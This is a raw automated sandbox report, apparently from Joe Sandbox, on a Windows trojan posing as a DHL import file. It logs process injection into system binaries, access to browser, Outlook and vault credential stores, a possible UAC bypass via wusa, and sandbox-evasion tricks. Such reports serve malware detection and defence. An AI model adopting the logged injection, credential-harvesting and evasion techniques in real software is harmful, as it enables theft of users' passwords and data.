Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: String function: 00500A30 appears 46 times
Source: C:\Windows\SysWOW64\net.exe	Code function: String function: 02F1F290 appears 103 times
Source: C:\Windows\SysWOW64\net.exe	Code function: String function: 02ED5130 appears 58 times
Source: C:\Windows\SysWOW64\net.exe	Code function: String function: 02F0EA12 appears 86 times
Source: C:\Windows\SysWOW64\net.exe	Code function: String function: 02E8B970 appears 262 times
Source: C:\Windows\SysWOW64\net.exe	Code function: String function: 02EE7E54 appears 107 times

Source: DHL_IMPORT_8236820594.exe, 00000000.00000003.1657958407.00000000037F3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL_IMPORT_8236820594.exe
Source: DHL_IMPORT_8236820594.exe, 00000000.00000003.1657417769.000000000399D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL_IMPORT_8236820594.exe

Source: DHL_IMPORT_8236820594.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/2@11/10

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_005537B5 GetLastError,FormatMessageW,

0_2_005537B5

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_005410BF AdjustTokenPrivileges,CloseHandle,		0_2_005410BF
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_005416C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_005416C3

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_005551CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_005551CD

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_0056A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0056A67C

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_0055648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0055648E

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_004E42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_004E42A2

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

File created: C:\Users\user\AppData\Local\Temp\batchers

Jump to behavior

Source: DHL_IMPORT_8236820594.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: net.exe, 00000005.00000003.2097976480.0000000000602000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.3505635674.0000000000627000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000003.2097976480.0000000000627000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: DHL_IMPORT_8236820594.exe	ReversingLabs: Detection: 42%
Source: DHL_IMPORT_8236820594.exe	Virustotal: Detection: 31%

Source: unknown	Process created: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe"
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe"
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	Process created: C:\Windows\SysWOW64\wusa.exe "C:\Windows\SysWOW64\wusa.exe"
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe"	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	Process created: C:\Windows\SysWOW64\wusa.exe "C:\Windows\SysWOW64\wusa.exe"	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\net.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\net.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: DHL_IMPORT_8236820594.exe

Static file information: File size 1607168 > 1048576

Source: DHL_IMPORT_8236820594.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DHL_IMPORT_8236820594.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DHL_IMPORT_8236820594.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DHL_IMPORT_8236820594.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DHL_IMPORT_8236820594.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DHL_IMPORT_8236820594.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: DHL_IMPORT_8236820594.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wusa.pdbGCTL source: gdWgEHryJDTaS.exe, 00000003.00000003.1835970150.000000000095B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: net.pdbUGP source: svchost.exe, 00000001.00000003.1865620588.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1897224654.0000000003412000.00000004.00000020.00020000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000003.00000003.1836127008.00000000009FD000.00000004.00000001.00020000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000003.00000002.3506149232.0000000000A08000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wusa.pdb source: gdWgEHryJDTaS.exe, 00000003.00000003.1835970150.000000000095B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gdWgEHryJDTaS.exe, 00000003.00000002.3505893888.00000000007FE000.00000002.00000001.01000000.00000005.sdmp, gdWgEHryJDTaS.exe, 00000008.00000000.1987192502.00000000007FE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL_IMPORT_8236820594.exe, 00000000.00000003.1657304784.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, DHL_IMPORT_8236820594.exe, 00000000.00000003.1658062081.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1807048272.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1897362519.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1897362519.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1805257232.0000000003600000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000003.1914442444.0000000000948000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.3506747476.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000005.00000003.1916425362.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.3506747476.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL_IMPORT_8236820594.exe, 00000000.00000003.1657304784.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, DHL_IMPORT_8236820594.exe, 00000000.00000003.1658062081.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1807048272.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1897362519.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1897362519.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1805257232.0000000003600000.00000004.00000020.00020000.00000000.sdmp, net.exe, net.exe, 00000005.00000003.1914442444.0000000000948000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.3506747476.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000005.00000003.1916425362.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.3506747476.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: net.exe, 00000005.00000002.3505635674.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.3507156756.000000000348C000.00000004.10000000.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000008.00000002.3506622146.00000000027AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208468387.000000002BE6C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: net.exe, 00000005.00000002.3505635674.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.3507156756.000000000348C000.00000004.10000000.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000008.00000002.3506622146.00000000027AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208468387.000000002BE6C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: net.pdb source: svchost.exe, 00000001.00000003.1865620588.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1897224654.0000000003412000.00000004.00000020.00020000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000003.00000003.1836127008.00000000009FD000.00000004.00000001.00020000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000003.00000002.3506149232.0000000000A08000.00000004.00000001.00020000.00000000.sdmp

Source: DHL_IMPORT_8236820594.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DHL_IMPORT_8236820594.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DHL_IMPORT_8236820594.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DHL_IMPORT_8236820594.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DHL_IMPORT_8236820594.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_004E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004E42DE

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00500A76 push ecx; ret	0_2_00500A89
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_033E0000 pushfd ; iretd	0_2_033E0003
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00415037 push 00000010h; retf	1_2_0041503D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004189FB push cs; ret	1_2_00418A05
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004183FA pushfd ; ret	1_2_0041841B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040EC3C push esp; retf	1_2_0040EC3E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040BC9A push ebp; iretd	1_2_0040BC9B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403530 push eax; ret	1_2_00403532
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040D60D push ds; iretd	1_2_0040D61A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411EFC push ecx; iretd	1_2_00411F0D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411F5A push ecx; iretd	1_2_00411F0D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040177A push esp; ret	1_2_0040174E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040171C push esp; ret	1_2_0040174E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004017AF push esp; ret	1_2_004017CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A0225F pushad ; ret	1_2_03A027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A027FA pushad ; ret	1_2_03A027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A309AD push ecx; mov dword ptr [esp], ecx	1_2_03A309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A0283D push eax; iretd	1_2_03A02858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A01366 push eax; iretd	1_2_03A01369
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E6225F pushad ; ret	5_2_02E627F9
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E627FA pushad ; ret	5_2_02E627F9
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E6283D push eax; iretd	5_2_02E62858
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E909AD push ecx; mov dword ptr [esp], ecx	5_2_02E909B6
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E61368 push eax; iretd	5_2_02E61369
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004A8767 push ebp; iretd	5_2_004A8768
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004AE708 push esi; iretd	5_2_004AE70A
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004AE9C9 push ecx; iretd	5_2_004AE9DA
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004AEA27 push ecx; iretd	5_2_004AE9DA
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004C0E6C push ebp; iretd	5_2_004C0E6F
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004B4EC7 pushfd ; ret	5_2_004B4EE8
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004B54C8 push cs; ret	5_2_004B54D2

Persistence and Installation Behavior

Windows Update Standalone Installer command line found (may be used to bypass UAC)

Source: gdWgEHryJDTaS.exe, 00000003.00000003.1835970150.000000000095B000.00000004.00000001.00020000.00000000.sdmp

Memory string: DWS;zWusaHiddenFailed to allocate and initialize Administrators group SID.WusaIsUserAdminFailed to check token membership.Failed to get message text for id %uWusaLoadMessageWusaMessageBoxFailed: TaskDialog()Failed to get message for error 0x%xWusaGetErrorMessageWusaCreateLockFileFailed to allocate memory for lock file path.Failed to create lock file %SFailed: GetFullPathName() failed for %SWusaGetFullPathNameFailed to allocate memory for full path.Failed to create extract job for location: %SWusaExtractAllFilesFromCabinetFailed to add container for cabinet: %SFailed: ExtractAllFiles()Failed to extract files from cabinet %SFailed: LookupPrivilegeValue()EnablePrivilegeFailed: OpenProcessToken()Failed: AdjustTokenPrivileges()Failed: AdjustTokenPrivileges(); not all token privileges were assignedFailed: GetTokenInformation()WusaGetUserSIDFailed: CopySid()Failed to PostMessage to progress window, error code %uWusaPostMessagewusa.lockFailed to create eventAppModule::InitFailed to initialize COM securityFailed to initialize critical sectionFailed to show welcome dialogFailed to show non administrator dialogUser is not a member of the Administrators group.Failed to show multiple instance dialogError: Another instance of wusa.exe is running.Failed to create sandboxCreated sandbox %lsFailed: AppModule::SetScanCabPath()Failed to get application title text, id %uFailed to allocate BSTR for application titleFailure returned by InitCommonControlsEx()Failure returned by CreateFont()Failed to get STR_EXPAND_START textFailed to get STR_EXPAND_START_UNINSTALL textFailed to get STR_SEARCH_START textFailed to get STR_COPY_START textFailed to get STR_UNINSTALL_START textFailed to set done event to release shutdown blockAppModule::UninitDeleting sandbox %SAppModule::DeleteSandBoxFailed to delete sandboxCommandLineToArgvW() failed.AppModule::ParseCommandLineError: Too few arguments.Failed to get command line length.Failed to allocate memory for ignored arguments.Failed. Restart mode was supplied multiple times30Failed to parse switchFailed. /warnrestart has invalid formatFailed. /kb was supplied multiple timesFailed. /kb has invalid formatKBFailed to prefix KB numberFailed. /log was supplied multiple timesFailed. /gpmode was supplied multiple timesFailed. /gpmode has invalid formatFailed to allocate memory for product codeFailed to set product code to %lsFailed to add an argument to the ignored list Failed to add a blank space to the ignored argument listUnrecognized argument %SFailed to get MSU file nameFailed to get MSU file name or KB numberFailed: /uninstall with /kb and /quiet options is not supportedFailed to show /extract not supported message boxFailed: /extract is not a supported optionCommand line is %lsFailed to get source lengthAppModule::CopyStringWithQuoteFailed to allocate temp buffer"%s"Failed to copy stringFailure returned by SystemParametersInfo()AppModule::CreateFontWFailure returned by CreateFontIndirectW()Failure returned by DeleteObject()Failure r

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_004FF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_004FF98E
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00571C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00571C41

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-96585

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	API/Special instruction interceptor: Address: 33E324C
Source: C:\Windows\SysWOW64\net.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\net.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\net.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\net.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\net.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\net.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\net.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\net.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_03A7096E rdtsc

1_2_03A7096E

Source: C:\Windows\SysWOW64\net.exe	Window / User API: threadDelayed 1922			Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Window / User API: threadDelayed 8051			Jump to behavior

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	API coverage: 3.4 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %
Source: C:\Windows\SysWOW64\net.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\net.exe TID: 8100	Thread sleep count: 1922 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe TID: 8100	Thread sleep time: -3844000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe TID: 8100	Thread sleep count: 8051 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe TID: 8100	Thread sleep time: -16102000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe TID: 8128	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe TID: 8128	Thread sleep time: -36000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\net.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\net.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_005568EE FindFirstFileW,FindClose,	0_2_005568EE
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_0055698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0055698F
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_0054D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0054D076
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_0054D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0054D3A9
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00559642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00559642
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_0055979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0055979D
